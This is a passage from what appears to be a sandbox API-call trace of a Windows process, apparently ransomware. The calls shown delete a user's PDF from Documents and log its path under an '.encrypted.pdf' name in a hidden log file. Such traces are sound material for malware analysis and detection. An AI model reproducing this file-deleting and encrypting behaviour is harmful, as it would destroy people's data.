returned 0x6 [0035.668] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\lckicvhsnu_6z.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.669] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.670] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.670] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.670] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.670] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.670] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.671] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFilePart=0x0) returned 0x60 [0035.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x14f8ed20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0x7c2100 [0035.671] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\lckicvhsnu_6z.pdf")) returned 1 [0035.673] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x14f8ed20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0 [0035.673] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.673] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.673] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.673] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.674] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.674] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.674] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.674] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.674] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.674] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.674] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.674] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.674] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.675] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1aa9, lpOverlapped=0x0) returned 1 [0035.675] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.675] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1aa9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.675] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.encrypted.pdf\r\n", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0035.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6d) returned 0x7db378 [0035.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.encrypted.pdf\r\n", cchWideChar=109, lpMultiByteStr=0x7db378, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.encrypted.pdf\r\n", lpUsedDefaultChar=0x0) returned 109 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0035.675] WriteFile (in: hFile=0x140, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x6c, lpOverlapped=0x0) returned 1 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0035.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.675] CloseHandle (hObject=0x140) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.677] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.677] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.678] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.678] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.679] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 